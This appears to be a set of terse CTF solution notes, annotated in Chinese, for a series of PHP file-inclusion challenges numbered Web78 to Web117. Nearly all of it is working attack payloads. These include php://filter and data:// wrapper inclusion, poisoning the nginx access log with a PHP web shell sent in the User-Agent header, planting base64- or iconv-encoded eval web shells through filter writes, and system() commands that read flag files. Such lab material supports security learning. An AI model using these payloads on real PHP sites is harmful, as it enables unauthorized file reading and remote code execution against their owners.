Web78
payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
Web79
<?php system('cat flag.php');
Data协议写入内容读取
payload:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
Web80
?file=/var/log/nginx/access.log
文件包含nignx日志文件
User-Agent: <?php eval($_POST[1]);?>
1=system(ls);
1=system('tac fl0g.php');
Web81
绕过php
?file=/var/log/nginx/access.log
文件包含nignx日志文件
User-Agent: <?=eval($_POST[1]);?>
1=system(ls);
1=system('tac fl0g.php');
Web87
Payload:
?file=php://filter/write=convert.base64-decode/resource=1.php 并且进行两次url编码
Payload:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
再对posy上传的content二次base64加密
content=<?php @eval($_POST[1]);?>
content=UEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUcy9QZz09
访问1.php
1=system(ls);
1=system('tac fl0g.php');
Web88
Data为协议:
<?php system('cat fl0g.php'); ?>
Base64加密后:
PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4
payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTsgPz4
Web116
环境损坏
Web117
?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=2.php
contents=?<hp pe@av(l_$OPTSa[aa]a;)>?
aaaa=system("tac f*");
